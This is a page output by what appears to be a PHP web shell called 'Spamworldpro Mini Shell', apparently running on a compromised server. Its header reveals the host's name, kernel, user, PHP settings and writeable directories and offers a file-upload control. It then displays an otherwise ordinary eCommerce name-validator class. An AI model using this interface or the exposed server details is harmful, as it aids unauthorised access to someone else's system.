Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/Ecombricks/Framework/Validator/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/Ecombricks/Framework/Validator/NameValidator.php
<?php
/**
 * Copyright © eComBricks. All rights reserved.
 * See LICENSE.txt for license details.
 */
namespace Ecombricks\Framework\Validator;

/**
 * Name validator
 */
class NameValidator extends \Ecombricks\Framework\Validator\StringValidator
{
    
    /**
     * Initialize
     * 
     * @return $this
     */
    public function _construct()
    {
        parent::_construct();
        $this
            ->setMinLength(2)
            ->setMaxLength(64)
            ->setLabel('name');
        return $this;
    }
    
    /**
     * Callback validator function
     * 
     * @param string $value
     * @return bool
     */
    public function callbackValidatorFunction($value)
    {
        return $this->checkUniqueness($value, 'getIdByName');
    }
    
    /**
     * Add validators
     * 
     * @param mixed $value
     * @return $this
     */
    protected function addValidators($value)
    {
        parent::addValidators($value);
        $this->addCallbackValidator($value);
        if ($this->hasCallbackValidator()) {
            $this->getCallbackValidator()
                ->setMessage(
                    __('%1 with the same name is already exists.', $this->getObjectLabelFirstLetterUppercased()),
                    \Zend_Validate_Callback::INVALID_VALUE
                );
        }
        return $this;
    }
    
}

Spamworldpro Mini